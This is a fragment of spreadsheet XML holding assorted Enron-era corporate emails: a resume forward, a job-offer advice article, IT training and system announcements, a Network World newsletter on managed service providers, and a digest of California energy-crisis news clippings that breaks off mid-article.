    <t>PR Candidate Resume</t>
  </si>
  <si>
    <t>As per our call._x000D_
----- Forwarded by Mark Taylor/HOU/ECT on 06/07/2001 12:00 PM -----_x000D_
_x000D_
	Tbockius@aol.com_x000D_
	05/29/2001 07:24 AM_x000D_
		 _x000D_
		 To: mark.taylor@enron.com_x000D_
		 cc: _x000D_
		 Subject: thanks for forwarding resume_x000D_
_x000D_
_x000D_
Mark,_x000D_
_x000D_
Attached is my resume.  Thanks for forwarding it._x000D_
_x000D_
Ted_x000D_
_x000D_
 - ted c bockius resume.doc</t>
  </si>
  <si>
    <t>Tue, 19 Mar 2002 08:34:53 -0800 (PST)</t>
  </si>
  <si>
    <t>got in at 10....just read the article....i agree whole-heartedly, which is why i declined w/ Cascade up in Seattle...totally identified w/ his comment about being depressed before even start the job._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Emily Hillegeist" &lt;ehillegeist@hotmail.com&gt;@ENRON  _x000D_
Sent:	Tuesday, March 19, 2002 9:34 AM_x000D_
To:	Scott, Susan M._x000D_
Subject:	 _x000D_
_x000D_
_x000D_
just a little article i stumbled upon earlier this morning.....semi interesting.....am mostly just bored....._x000D_
e_x000D_
 _x000D_
 _x000D_
Thanks, But No Thanks: Turning Down the Offer_x000D_
by Carole Martin_x000D_
	[IMAGE]	_x000D_
[IMAGE]	[IMAGE]	_x000D_
	[IMAGE]	_x000D_
_x000D_
In today's job market, it seems ludicrous to talk about turning down a job offer. Everyone should be so lucky as to even get an offer. But you need to stop and think before you jump out of desperation into a situation that is not good for you. Even though it may be uncomfortable, there are times when you have to say, "Thanks, but no thanks."_x000D_
Great News; You've Got an Offer_x000D_
George was laid off from his job in June. After four months of rejection, he finally got an offer. He was excited. Or was he?_x000D_
It really wasn't the job he wanted. It was just one of the jobs he had applied for, because he was qualified and could perform the duties. The job really didn't match any of his values. Taking this job meant a long commute in heavy traffic. Financially, it was going to be a lateral move. But, most of all it was not a challenging or growth-related opportunity. The thought of going to this job day after day depressed him before he even accepted._x000D_
How could he turn down an offer after so many months of waiting? He was dreading telling his wife about the offer for fear she would think he was crazy for not taking it. How could he tell the company he didn't want the job after going through all those interviews?_x000D_
Do What You Want_x000D_
The company wanted to know by the end of the week. George was making himself sick thinking about the decision. That afternoon, he happened to catch a television show about taking care of yourself in stressful times. "Do what you want to do, not what others want you to do," was the message. George knew what he wanted to do. He wanted to continue looking for a better opportunity._x000D_
When he told his wife, not only was she understanding, but she was encouraging as well. "Life is too short to make decisions that are going to make you miserable," she told George. The decision was made. George would turn down the offer. Together they wrote a script to gracefully reject it._x000D_
Making the Call_x000D_
The next morning George placed a call to the hiring manager. "I've thought over the offer extended and have made a career decision not to accept the position," he told the manager. "I am grateful to you for believing in me, and I hope there may be an opportunity for us to do business in some way in the future." The hiring manager was disappointed but said he understood career decisions and the need to do what's in one's best interest._x000D_
It takes courage and maturity to reject a job you really don't want. The best way to handle difficult decisions is to weigh the consequences and decide what is best for you. Since you don't want to alienate a business contact in the process, it is best to be as professional about the conversation as you can. Preparing a script ahead of time will assist you with your discomfort. No one likes confronting unpleasant situations, but one difficult moment compared to weeks, months or even years of work you find unpleasant is a small price to pay._x000D_
[IMAGE][IMAGE]_x000D_
_x000D_
Get your FREE download of MSN Explorer at http://explorer.msn.com .</t>
  </si>
  <si>
    <t>Tue, 9 May 2000 10:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>New Role</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations on your new role as Chief Strategy Officer.    Your _x000D_
leadership in ENA was appreciated and I will miss your active participation _x000D_
in ENA's business.  However, I hope that we will have opportunities to work _x000D_
together in the future.  --Sally </t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 12:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fantastic News!!</t>
  </si>
  <si>
    <t xml:space="preserve">  The latest release has arrived!_x000D_
_x000D_
A new release of e-Request (the web based network access system) is being _x000D_
launched September 11, 2000.  It is guaranteed to enhance the way you access _x000D_
Enron Net Works supported resources such as: applications, conference room _x000D_
administration, data directories, and restricted printers.  Added benefits _x000D_
include:_x000D_
_x000D_
ability to provide direct feedback to the e-Request team_x000D_
new regional specific application lists_x000D_
ability to request creation of new, secured directories_x000D_
faster, more efficient navigation_x000D_
more attractive, cleaner interface_x000D_
accessible history of resources_x000D_
more details listed on pending and closed requests_x000D_
logon is more reliable_x000D_
_x000D_
The current release is available at http://itcentral.enron.com.  To learn _x000D_
more about e-Request, attend one of our premier brown bag sessions.  RSVP by _x000D_
contacting Kim Lerro at extension. 3-4224.  Seating is limited, so call now _x000D_
to reserve your seat!_x000D_
_x000D_
Brown Bag Schedule (One Hour Sessions)_x000D_
_x000D_
Monday August 28th _x000D_
8:30  AM EB0560_x000D_
10:00  AM EB0560_x000D_
11:30  AM EB0560_x000D_
2:00  PM EB22C1_x000D_
3:30  PM EB22C1_x000D_
_x000D_
Thursday August 31st_x000D_
3:30 PM EB22C1_x000D_
_x000D_
Friday September 1st_x000D_
8:30 AM EB22C1_x000D_
2:00 PM EB22C1_x000D_
3:30 PM EB22C1_x000D_
_x000D_
Wednesday September 6th_x000D_
3:30 PM EB22C1_x000D_
_x000D_
Thursday September 7th_x000D_
8:00 AM EB22C1_x000D_
_x000D_
Friday September 8th_x000D_
9:00 AM EB22C1</t>
  </si>
  <si>
    <t>Tue, 9 Nov 1999 02:53:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'jeffrey.keeler@enron.com', 'kevin.hannon@enron.com', 'cynthia.sandherr@enron.com', 'chris.long@enron.com', 'joe.hillings@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Report on over-the-counter derviatives</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the report on over-the-counter derivatives released by the _x000D_
Treasury Department this morning._x000D_
</t>
  </si>
  <si>
    <t>Sun, 23 Jul 2000 04:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Give Up Agreements: Banc One</t>
  </si>
  <si>
    <t xml:space="preserve">Mary:_x000D_
These agreements are acceptable.  Please sign the give up agreements with _x000D_
Banc One._x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
MARY COOK_x000D_
07/19/2000 02:30 PM_x000D_
To: John Arnold/HOU/ECT@ECT, Sarah Wesner/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: Give Up Agreements:  Banc One_x000D_
_x000D_
I have received the executed counterparts of the Give Up Agreements from Banc _x000D_
One for our signature contemplating several executing brokers.  It is my _x000D_
understanding that trades were recently pulled from Banc One and therefore, _x000D_
these agreements may not now be warranted.   John, please advise me regarding _x000D_
whether you will want to sign these agreements with Banc One or not.  Thank _x000D_
you.  Mary Cook  ENA Legal_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 02:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>caledonia interconnect to SOCO</t>
  </si>
  <si>
    <t xml:space="preserve">The models reflects 10 years on the revenue forecast.  The DASH reflects _x000D_
Mitch's changes from Wednesday.  We will talk later.  _x000D_
_x000D_
Issues to consider:_x000D_
1)  Payback year shifts back to 3 years from 2.5 years when considering taxes _x000D_
and dep._x000D_
2)  IRR increases from 27% to 29% with 10 yr forecast_x000D_
3)  Balance sheet still out of balance_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 14:53:31 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'applicationservice@bdcimail.com'})</t>
  </si>
  <si>
    <t>Touched by an angel</t>
  </si>
  <si>
    <t>NETWORK WORLD NEWSLETTER: JEB BOLDING_x000D_
on APPLICATION SERVICE PROVIDERS_x000D_
11/20/01 - Today's focus: Touched by an angel_x000D_
_x000D_
Dear Wincenty Kaminski,_x000D_
_x000D_
In this issue:_x000D_
_x000D_
* BMC enters MSP market with GuardianAngel_x000D_
* Links related to ASPs_x000D_
* Featured reader resource_x000D_
_x000D_
________________________________________________________________x000D_
TAKE IT OFF-LINE_x000D_
_x000D_
The high-tech industry has always run at breakneck pace. Even a_x000D_
wheezing economy will hardly slow it. In the past year,_x000D_
business theory surrounding technology has been reinvented and_x000D_
redefined multiple times. Check out the latest "must-read"_x000D_
books for technology-related business theories._x000D_
http://nww1.com/go/ad204.html_x000D_
_x000D_
________________________________________________________________x000D_
Today's focus: Touched by an angel_x000D_
_x000D_
By Jeb Bolding_x000D_
_x000D_
BMC released its GuardianAngel managed service provider_x000D_
offering at Comdex last week. While many managed service_x000D_
providers (MSP) struggle, I think GuardianAngel just might_x000D_
succeed._x000D_
_x000D_
One of my pet peeves about the ASP industry is the lack of_x000D_
software solutions that offer network, systems, and application_x000D_
management solutions to reveal ASP service levels for_x000D_
customers._x000D_
_x000D_
Most ASPs monitor their systems in some fashion. However, they_x000D_
rarely publicize that data out to their customers. If they do,_x000D_
commonly that information comes from a homegrown set of tools_x000D_
that report primarily on basic availability information about_x000D_
the hosted applications or systems. This really isn't service_x000D_
level management, though it may purport to be. In fact, the_x000D_
availability and performance numbers that are pushed out to_x000D_
customers through homegrown systems, are probably not all that_x000D_
indicative of true service levels since the solutions are_x000D_
designed by developers who are application experts at their_x000D_
ASP, not systems management experts._x000D_
_x000D_
So why can't ASPs go out and buy a good management solution_x000D_
that gives their customers a reasonable understanding of ASP_x000D_
system performance?_x000D_
_x000D_
I think there are three things that have inhibited ASPs from_x000D_
making that investment._x000D_
_x000D_
First, and foremost, is cost. Most independent software vendors_x000D_
create their management solutions from a sales perspective, to_x000D_
be sold into the enterprise space where the purchasers pay a_x000D_
steep up-front licensing cost and then a relatively minimal_x000D_
support fee per year._x000D_
_x000D_
Since the vast majority of service providers have business_x000D_
models that focus on regular monthly or quarterly payments,_x000D_
they've had a hard time rationalizing their cash flow to_x000D_
purchase a best of breed management product. I suppose that_x000D_
this is the kind of purchase, one might argue, that those high_x000D_
IPO valuations were supposed to cover 18 months ago. Nowadays,_x000D_
spending $1.5 million on a management product (including_x000D_
licensing, deployment, and customization) is out of the_x000D_
question._x000D_
_x000D_
Another problem is integration. For most ASPs, there simply is_x000D_
no management integration. Whatever applications or systems an_x000D_
enterprise outsources to an ASP, those are treated as islands_x000D_
of management technology, separate from the applications that_x000D_
enterprises manage internally. Even if an ASP has a monitoring_x000D_
and management product deployed, those solutions are not_x000D_
designed architecturally to populate a central console with_x000D_
event and data information, nor transmit information across a_x000D_
wire to a database inside the corporate firewall._x000D_
_x000D_
Finally, traditional management solutions are designed to give_x000D_
an IT administrator a centralized view of what's going on with_x000D_
their enterprise systems. They're not designed to display_x000D_
customer-centric data to multiple customers who are protected_x000D_
from viewing the event and systems data of other customers._x000D_
_x000D_
To address many of these problems, MSPs have approached the ASP_x000D_
market need with solutions that are priced based on a_x000D_
subscription service, designed specifically for integrating_x000D_
event and data information across a distributed network, and_x000D_
developed with an interactive Web interface for customer and_x000D_
administrator views._x000D_
_x000D_
However, MSPs, just like ASPs have had their own troubles and_x000D_
lately there has been consolidation within the MSP ranks._x000D_
_x000D_
I admit that I've pondered why some of the systems management_x000D_
companies have not offered MSP solutions themselves. It may be_x000D_
culture that prevents them from addressing the needs of_x000D_
extended enterprises and service providers. But with BMC, one_x000D_
of the big management players, launching GuardianAngel, that_x000D_
will hopefully, address many of the infrastructure management_x000D_
needs that service providers have._x000D_
_x000D_
Most importantly, this service offering is supported by BMC, a_x000D_
company with deep pockets and the ability to stay the MSP_x000D_
course financially, unlike many of its smaller, more_x000D_
specialized MSP brethren._x000D_
_x000D_
With the larger BMC corporation behind it, I think that_x000D_
GuardianAngel can make a strong go of the MSP space._x000D_
_x000D_
________________________________________________________________x000D_
To contact Jeb Bolding:_x000D_
_x000D_
Jeb Bolding is senior consultant with Enterprise Management_x000D_
Associates in Boulder, Colo., an analyst and market research_x000D_
firm focusing exclusively on enterprise management. Bolding has_x000D_
10 years of experience in the network systems industry, most_x000D_
recently with eCollege.com, an ASP for higher education, where_x000D_
he was director of product development. He can be reached at_x000D_
mailto:jbolding@enterprisemanagement.com._x000D_
________________________________________________________________x000D_
NW Fusion's BuyIT has the IT resources you need!  Our directory_x000D_
hosts thousands of qualified service providers.  Post an RFP_x000D_
anonymously and FREE, receive competitive bids, begin_x000D_
negotiations, and get your project done right!_x000D_
http://nwfusion.newmediary.com/nww110901nwltr1_x000D_
________________________________________________________________x000D_
RELATED EDITORIAL LINKS_x000D_
_x000D_
U.S. special forces to outsource net ops_x000D_
Network World, 11/19/01_x000D_
http://www.nwfusion.com/archive/2001/127511_11-19-2001.html_x000D_
_x000D_
Outsourcing options on the rise_x000D_
Network World, 11/19/01_x000D_
http://www.nwfusion.com/news/2001/1119carrier.html_x000D_
_x000D_
Breaking ASP news from Network World, updated daily:_x000D_
http://www.nwfusion.com/topics/asp.html_x000D_
_x000D_
Archive of the ASP newsletter:_x000D_
http://www.nwfusion.com/newsletters/asp/index.html_x000D_
_______________________________________________________________x000D_
FEATURED READER RESOURCE_x000D_
_x000D_
Network World Fusion's The Edge site_x000D_
_x000D_
Network World Fusion's The Edge is a resource devoted to the_x000D_
advances in service-provider networks that are shaking up the_x000D_
old telecom order. In classic Network World fashion, we focus_x000D_
on the hardware, software and services coming to market - but_x000D_
this time from the vendors targeting legacy carriers, new_x000D_
alternative local carriers, ISPs and application service_x000D_
providers. http://www.nwfusion.com/edge/index.html_x000D_
________________________________________________________________x000D_
May We Send You a Free Print Subscription?_x000D_
You've got the technology snapshot of your choice delivered_x000D_
at your fingertips each day. Now, extend your knowledge by_x000D_
receiving 51 FREE issues to our print publication. Apply_x000D_
today at http://www.nwwsubscribe.com/nl_x000D_
________________________________________________________________x000D_
SUBSCRIPTION SERVICES_x000D_
_x000D_
To subscribe or unsubscribe to any Network World e-mail_x000D_
newsletters, go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/notprinteditnews.asp_x000D_
_x000D_
To unsubscribe from promotional e-mail go to:_x000D_
http://www.nwwsubscribe.com/ep_x000D_
_x000D_
To change your e-mail address, go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/changeemail.asp_x000D_
_x000D_
Subscription questions? Contact Customer Service by replying to_x000D_
this message._x000D_
_x000D_
Have editorial comments? Write Jeff Caruso, Newsletter Editor,_x000D_
at: mailto:jcaruso@nww.com_x000D_
_x000D_
For advertising information, write Jamie Kalbach, Fusion Sales_x000D_
Manager, at: mailto:jkalbach@nww.com_x000D_
_x000D_
Copyright Network World, Inc., 2001_x000D_
_x000D_
------------------------_x000D_
This message was sent to:  vkamins@enron.com</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 17:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>eSource presents Lexis-Nexis training_x000D_
_x000D_
ADVANCED_x000D_
_x000D_
This session will cover advanced searching tips.  It will also cover using _x000D_
Smart Indexing to narrow your search results.  Find out how to customize your _x000D_
desktop for easier searching._x000D_
_x000D_
Attend our Lexis-Nexis Advanced Clinic: _x000D_
    _x000D_
May. 18     8:30 - 10:00 AM    EB572 _x000D_
_x000D_
_x000D_
PUBLIC RECORDS_x000D_
_x000D_
Lexis-Nexis is the premier provider of public record information.  We will _x000D_
learn about materials available to you including Secretary of State Filings _x000D_
and DBA's, UCC filings, Bankruptcies, and Property Records.  If you are doing _x000D_
due diligence on companies, especially smaller ones, this is a session you _x000D_
will want _x000D_
to attend._x000D_
_x000D_
Attend our Lexis-Nexis Public Records Clinic: _x000D_
_x000D_
May. 18    10:30 AM -12:00 NOON      EB572 _x000D_
   _x000D_
_x000D_
Seats fill up fast! To reserve a seat, please call Stephanie E. Taylor at _x000D_
5-7928_x000D_
Cost $25.00 Per Person_x000D_
No Shows will be charged $50.00_x000D_
* Please bring your Lexis-Nexis login ID and password. If you don't have one, _x000D_
a guest ID will be provided._x000D_
_x000D_
Check the eSource training page at http://esource.enron.com/training.doc for _x000D_
additional training sessions and vendor presentations._x000D_
_x000D_
http://esource.enron.com</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 04:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sgovenar@govadv.com', 'alex.parsons@enron.com', 'janet.butler@enron.com', 'pat.shortridge@enron.com', 'tom.briggs@enron.com', 'mark.schroeder@enron.com', 'linda.robertson@enron.com', 'markus.fiala@enron.com', 'peter.styles@enron.com', 'stella.chan@enron.com', 'syamane@marathon-com.com', 'john.shelk@enron.com', 'ban.sharma@enron.com', 'karen.denne@enron.com', 'michael.brown@enron.com', "nicholas.o'day@enron.com", 'robert.neustaedter@enron.com', 'ken@kdscommunications.com', 'chris.holmes@enron.com', 'hgovenar@govadv.com', 'rob.bradley@enron.com', 'lipsen@cisco.com', 'jeannie.mandelker@enron.com', 'mona.petrochko@enron.com', 'lora.sullivan@enron.com', 'lysa.akin@enron.com', 'carin.nersesian@enron.com', 'shirley.hudler@enron.com', 'richard.shapiro@enron.com', 'susan.mara@enron.com', 'rlichtenstein@marathon-com.com', 'peggy.mahoney@enron.com', 'jennifer.thome@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'lamar.frazier@enron.com', 'kathleen.sullivan@enron.com', 'mike.roan@enron.com', 'shelley.corman@enron.com', 'bryan.seyfried@enron.com', 'filuntz@aol.com', 'andrew.morrison@enron.com', 'john.sherriff@enron.com', 'jkradin@marathon-com.com', 'janel.guerrero@enron.com', 'elizabeth.linnell@enron.com', 'bhansen@lhom.com', 'roberta.staehlin@enron.com', 'karen.moore@enron.com', 'jeff.dasovich@enron.com', 'james.steffes@enron.com', 'sandra.mccubbin@enron.com', 'mark.palmer@enron.com', 'ann.schmidt@enron.com', 'john.neslage@enron.com', 'evan.hughes@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>Please see the attached articles:_x000D_
_x000D_
SD Union, Sun, 6/3:  Poor find more red tape than federal energy aid_x000D_
_x000D_
SD Union, Sun, 6/3: Top energy adviser confident of gaining pact for L.A.=_x000D_
=20_x000D_
surplus_x000D_
_x000D_
SD Union, Sun, 6/3: Energy firm ties enriched top advisers to president=20_x000D_
_x000D_
SD Union, Sun, 6/3: Report: State may have little money left to head of=20_x000D_
blackouts_x000D_
_x000D_
SD Union, Sat, 6/2: San Onofre reactor back on line, sending power to state=_x000D_
=20_x000D_
grid_x000D_
_x000D_
SD Union, Sat, 6/2: State files to manage energy on its own_x000D_
_x000D_
SD Union, Sat, 6/2: Escondido not running power plant process, ex-official=_x000D_
=20_x000D_
says=20_x000D_
_x000D_
SD Union, Sat, 6/2: PG&amp;E bankruptcy judge won't challenge state regulation_x000D_
_x000D_
SD Union, Sat, 6/2: New majority leader says nay to electricity price caps_x000D_
_x000D_
LA Times, Sun, 6/3: Watchdogs Take a Hit in State's Power Ills_x000D_
_x000D_
LA Times, Sat, 6/2: Duke Charged Record Price for Electricity=20_x000D_
_x000D_
LA Times, Sat, 6/2: Incoming Senate Leader Daschle Lukewarm on Power Price=_x000D_
=20_x000D_
Caps_x000D_
_x000D_
LA Times, Sat, 6/2: PUC May Trip Bailout of Edison_x000D_
_x000D_
LA Times, Mon, 6/4: Better Than Bankruptcy        (Commentary)_x000D_
_x000D_
SF Chron, Mon, 6/4:  Electricity usage shrinks by 11%=20_x000D_
State's consumers beat goal set by governor_x000D_
_x000D_
SF Chron, Mon, 6/4:  Enron is my spiritual teacher   (Commentary)_x000D_
_x000D_
SF Chron, Mon, 6/4:  Change in Senate control slows Bush's energy plan_x000D_
_x000D_
SF Chron, Mon, 6/4:  Developments in California's energy crisis_x000D_
_x000D_
SF Chron, Mon, 6/4:  Electricity usage shrinks by 11%=20_x000D_
State's consumers beat goal set by governor_x000D_
_x000D_
SF Chron, Mon, 6/4: Gov. Davis -- please act_x000D_
_x000D_
SF Chron, Mon, 6/4:  Power buying by cities gets Assembly OK=20_x000D_
S.F. could contract for cheaper electricity if bill becomes law_x000D_
_x000D_
SF Chron, Sun, 6/3:  Critics say FERC ignored California's deregulation fla=_x000D_
ws=20_x000D_
_x000D_
Mercury News, Mon, 6/4: New market overwhelms U.S. agency=20_x000D_
_x000D_
Mercury News, Mon, 6/4: U.S. agency's actions invited power disaster=20_x000D_
_x000D_
Mercury News, Mon, 6/4: Gov. Davis, by failing to act, is to blame for ener=_x000D_
gy=20_x000D_
crisis (Commentary)_x000D_
_x000D_
OC Register, Mon, 6/4:  Conservation paying off_x000D_
_x000D_
OC Register, Mon, 6/4:  O.C. firms' energy-saving moves_x000D_
_x000D_
Individual.com (Businesswire), Mon, 6/4:  Pacific Gas and Electric Company=_x000D_
=20_x000D_
Launches=20_x000D_
Campaign to Enhance Outage Preparedness; State Predicts More Power Shortage=_x000D_
s=20_x000D_
In Coming Weeks And Months=20_x000D_
_x000D_
Individual.com (Businesswire), Mon, 6/4:  PG&amp;E Issues Statement After Court=_x000D_
=20_x000D_
Decision=20_x000D_
On Its Request for Stay=20_x000D_
_x000D_
WSJ, Mon, 6/4:  The Pros and Cons of Power Price Caps=20_x000D_
_x000D_
---------------------------------------------------------------------------=_x000D_
---_x000D_
----------------------------------------_x000D_
_x000D_
_x000D_
Poor find more red tape than federal energy aid=20_x000D_
_x000D_
_x000D_
_x000D_
By Jeff McDonald?_x000D_
UNION-TRIBUNE STAFF WRITER=20_x000D_
June 3, 2001=20_x000D_
When George W. Bush arrived in California last week for the first time as=_x000D_
=20_x000D_
president, he quickly reaffirmed his belief that temporary price caps would=_x000D_
=20_x000D_
do nothing to reverse the runaway energy costs plaguing the Golden State.=_x000D_
=20_x000D_
Bush did, however, offer to stir an extra $150 million into the pot of=20_x000D_
government money doled out each year to help poor families pay their utilit=_x000D_
y=20_x000D_
bills.=20_x000D_
If lawmakers approve that gesture, a share of those proceeds could end up a=_x000D_
t=20_x000D_
Metropolitan Area Advisory Committee, known as MAAC, and Campesinos Unidos=_x000D_
=20_x000D_
Inc., the only agencies through which federal energy-assistance dollars=20_x000D_
headed into San Diego County may pass._x000D_
_x000D_
For some, that is a worrisome prospect.=20_x000D_
The two nonprofit organizations oversee millions of dollars in government=_x000D_
=20_x000D_
assistance to low-income San Diego-area families that need help meeting the=_x000D_
ir=20_x000D_
energy payments and weather-proofing their homes.=20_x000D_
For hundreds of senior citizens on fixed incomes and cash-strapped househol=_x000D_
ds=20_x000D_
struggling to stay afloat, applying for the Low-Income Home Energy Assistan=_x000D_
ce=20_x000D_
Program can be an impossible task.=20_x000D_
Office hours can be sketchy. Telephone messages often go unanswered.=20_x000D_
Applications by mail are returned for minor omissions, pushing back relief=_x000D_
=20_x000D_
for desperate people with overwhelming debt or pending shut-off notices.=20_x000D_
"I've been on the phone for two solid weeks and nobody tells me anything,"=_x000D_
=20_x000D_
said Brenda Hunt, a crossing guard from Santee who has been trying to secur=_x000D_
e=20_x000D_
help paying down a $1,500 utility bill racked up by her elderly parents.=20_x000D_
"It's frustrating."=20_x000D_
The federal program started in the 1970s as a modest effort to help poor=20_x000D_
families. At the time, it was minuscule by Washington standards. The energy=_x000D_
=20_x000D_
assistance program since has ballooned into a $1.8 billion appropriation.=_x000D_
=20_x000D_
The cost of administering the block grants and complying with onerous=20_x000D_
reporting rules often diverts resources from their primary purpose.=20_x000D_
Huge chunks of money intended for social services and energy assistance=20_x000D_
instead pay for salaries, lawyers, accountants, travel bills and a range of=_x000D_
=20_x000D_
unspecified expenses, a review by the Union-Tribune has found.=20_x000D_
"The irony is the government demands a high level of reporting, but doesn't=_x000D_
=20_x000D_
want to look at it very closely," said Peter Manzo, who directs the Center=_x000D_
=20_x000D_
for Nonprofit Management in Los Angeles. "It's a real administrative burden=_x000D_
."=20_x000D_
Last year, with special emergency allocations, MAAC and Campesinos Unidos=_x000D_
=20_x000D_
received more than twice the federal money for low-income energy assistance=_x000D_
=20_x000D_
-- and aided more than twice as many clients -- than they had in each of th=_x000D_
e=20_x000D_
two previous years.=20_x000D_
Campesinos Unidos, Spanish for "united farm workers," is an Imperial=20_x000D_
County-based social service agency that received more than $4 million last=_x000D_
=20_x000D_
year to help needy families with utility bills, and millions more to run=20_x000D_
preschool and other programs. It provided energy assistance to 11,500 clien=_x000D_
ts=20_x000D_
in 2000.=20_x000D_
According to tax records required to be made public, the agency spent $4.5=_x000D_
=20_x000D_
million on salary and benefits for 220 employees, $260,000 on attorneys and=_x000D_
=20_x000D_
$178,000 on travel, among other expenses, on 1999 income of $7.2 million.=_x000D_
=20_x000D_
Overhead costs at MAAC also eat up 65 percent of the money taken in by the=_x000D_
=20_x000D_
National City-based social service agency. MAAC provides energy and housing=_x000D_
=20_x000D_
assistance, a preschool, and drug-and alcohol-abuse programs.=20_x000D_
MAAC received more than $2.2 million in energy assistance grants and assist=_x000D_
ed=20_x000D_
6,000 people in 2000.=20_x000D_
From a total revenue of $11.1 million, MAAC paid more than $6.1 million in=_x000D_
=20_x000D_
salary and benefits to its 275 workers, an additional $1 million in=20_x000D_
professional fees and almost $170,000 for phone service, recent IRS filings=_x000D_
=20_x000D_
show.=20_x000D_
In outside audits required by the state, both organizations were cited for=_x000D_
=20_x000D_
lax records or internal financial controls. Two years ago, Campesinos Unido=_x000D_
s=20_x000D_
emerged from Chapter 11 bankruptcy, which it sought after paying a $600,000=_x000D_
=20_x000D_
judgment in a sexual harassment case.=20_x000D_
Officials from the nonprofits say the cost of running the variety of progra=_x000D_
ms=20_x000D_
is in line with what other agencies spend. They said they meet all=20_x000D_
restrictions attached to the money.=20_x000D_
"We can only spend X-number of dollars on administration," said Campesinos=_x000D_
=20_x000D_
Unidos director Jose M. Lopez, who reports to a board made up entirely of=_x000D_
=20_x000D_
Imperial County residents. "We cannot spend more than the formula tells us=_x000D_
=20_x000D_
to."=20_x000D_
Modest beginnings_x000D_
Federal energy-assistance began as a 1974 pilot project in Maine with a=20_x000D_
$478,000 grant. Aid expanded through the years and by 1982, the Low-Income=_x000D_
=20_x000D_
Home Energy Assistance Program received $1.8 billion a year.=20_x000D_
The 2002 budget plan pitched by Bush includes $1.7 billion in=20_x000D_
energy-assistance spending released to states in grants by the U.S.=20_x000D_
Department of Health and Human Services. Other money is awarded by the=20_x000D_
federal Department of Energy.=20_x000D_
State governments disperse the funds locally, either directly to counties o=_x000D_
r=20_x000D_
to nonprofits such as MAAC and Campesinos Unidos. Much of the money goes to=_x000D_
=20_x000D_
the densely populated Northeastern states to help reduce home heating costs=_x000D_
.=20_x000D_
In California, which ranked sixth among the 50 states with $83 million in=_x000D_
=20_x000D_
energy-assistance funding, the cash is distributed by the little-known stat=_x000D_
e=20_x000D_
Department of Community Services and Development.=20_x000D_
Eleven field monitors oversee the 44 local agencies that hand out relief=20_x000D_
dollars, and inspections are few. Four staff auditors review financial=20_x000D_
reports filed by the agencies receiving the federal grants. No suspensions =_x000D_
or=20_x000D_
disciplinary action has been taken against any of the contractors, official=_x000D_
s=20_x000D_
say.=20_x000D_
"We try to get out to each agency at least once every two years," said Toni=_x000D_
=20_x000D_
Curtis, chief deputy of the Department of Community Services and Developmen=_x000D_
t.=20_x000D_
"In the interim, we do what's called a desk-monitoring evaluation."=20_x000D_
Those reports are written by state monitors based on telephone calls to the=_x000D_
=20_x000D_
agencies. All agencies that give out federal money and weather-proof homes=_x000D_
=20_x000D_
must file bi-monthly work summaries in Sacramento.=20_x000D_
The law requires participating agencies to spend no more than 8 percent of=_x000D_
=20_x000D_
the energy assistance grant money on administration. To meet that standard,=_x000D_
=20_x000D_
the cost of offices, staff, phone service and other needs typically is spre=_x000D_
ad=20_x000D_
around other budgets within the nonprofit structure.=20_x000D_
Rules specify that energy assistance applications be prioritized in favor o=_x000D_
f=20_x000D_
disabled people, seniors and families with young children. There are far mo=_x000D_
re=20_x000D_
eligible households than can be served before the money runs out.=20_x000D_
Best-kept secret_x000D_
Help for underprivileged families dealing with rising energy costs extends=_x000D_
=20_x000D_
beyond the federal assistance. San Diego Gas and Electric steers needy=20_x000D_
customers to other programs funded by ratepayers, donors and state tax=20_x000D_
dollars.=20_x000D_
Gov. Gray Davis signed legislation last month requiring utilities to enroll=_x000D_
=20_x000D_
more customers in the CARE program, an under-used effort that discounts rat=_x000D_
es=20_x000D_
for low-income customers with money paid by utility customers.=20_x000D_
Less than 60 percent of the 225,000 households eligible for that program si=_x000D_
gn=20_x000D_
up, a ratio that SDG&amp;E was told to improve.=20_x000D_
The overwhelming leader in energy subsidies is the federal low-income=20_x000D_
assistance plan. Many San Diego County residents worry that too little of=_x000D_
=20_x000D_
that money makes its way to needy families.=20_x000D_
"It's not a fair and equitable distribution of government money," said Dean=_x000D_
=20_x000D_
Russo, a disabled Point Loma man who qualified for a $200 credit on his SDG=_x000D_
&amp;E=20_x000D_
bill after writing dozens of letters to state officials.=20_x000D_
"It's the best-kept secret in government: that there's money available but =_x000D_
no=20_x000D_
outreach to tell people about it. They give out a phone number, but there's=_x000D_
=20_x000D_
nobody there to answer the phone."=20_x000D_
MAAC and Campesinos Unidos set aside just a few hours a week to schedule=20_x000D_
appointments. Because of the volume of calls they receive, getting through=_x000D_
=20_x000D_
can be like winning the lottery. Critics say the agencies do too little=20_x000D_
outreach, and that they can be slow to respond to pleas for help.=20_x000D_
Jill Van Cleve, a 61-year-old Ramona woman who gets by on disability, maile=_x000D_
d=20_x000D_
what she thought was a completed application for SDG&amp;E credit early this=20_x000D_
year. Campesinos Unidos returned the paperwork weeks later, saying it was=_x000D_
=20_x000D_
missing details that Van Cleve said she could have provided by telephone.=_x000D_
=20_x000D_
"I felt they were playing a shell game as to which documents I needed to=20_x000D_
provide them with to establish my eligibility," she said.=20_x000D_
Long before electricity rates spiraled out of control in San Diego County=_x000D_
=20_x000D_
last year, MAAC program manager Sandra Cordova heard such complaints. There=_x000D_
=20_x000D_
may never be enough money to help everyone who qualifies, Cordova said.=20_x000D_
